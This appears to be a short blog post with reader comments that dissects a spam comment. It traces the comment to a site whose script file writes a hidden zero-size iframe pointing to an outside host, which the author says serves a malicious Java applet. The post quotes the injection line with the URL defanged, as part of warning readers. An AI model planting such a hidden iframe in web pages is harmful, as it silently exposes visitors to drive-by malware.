Anatomy of a spam comment
by Volker Weber
[CAUTION: Do NOT load any of the URLs mentioned below]
Today I have received yet another spam comment that tried to install a link to a site which calls itself "A WebSite for creative intellectuals" and pretends to educate you on the usage of The Gimp. This has happened before: Twice on 29.09.2004 from IP address 141.30.207.43, which belongs to the data center of the Technical University Dresden, and again from the same address on 5.6.2006. On 10.11.2006 the spammer has moved to 131.188.3.20, which (as the address used above) belongs to the Friedrich Alexander University Erlangen-Nuernberg. The site which the spammer links to belongs to a person with an address in Dresden.
If you examine the source code of the site, you will find that it loads /data.htm, which in term loads /ad/s-block.js which contains an interesting line:
document.write('<iframe src="http://x- road.co.kr/ric h/out.php" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');
This translates to an iframe loaded from http://x-road.co.kr/rich/out.php. This PHP script evaluates the referrer and either takes you to Yahoo.com or loads a malicious Java applet. Here is what Google has to say about this address:
And if you ask Google who links to this trap, you will find sites like sixtus.net, Schockwellenreiter, Mein Parteibuch, etc.
Comments
very interesting! thank you.
Vielleicht sollte man Google Adsense mal darauf aufmerksam machen, denn entweder handelt es sich um einen Adsense-Großkunden (zu erkennen am fehlenden Google-Logo bei der unten eingeblendeten Anzeige), oder die Jungs haben das Adsense Script verbotenerweise geändert. Soweit ich weiß, ist z.B. "google_hints" noch in der Testphase und nur für ausgewählte Kunden verfügbar.
Bei mir wird von der "/data.htm" übrigens nicht "/ad/s-block.js" aufgerufen, sondern "/ad/h-block.js".
Er lädt beide.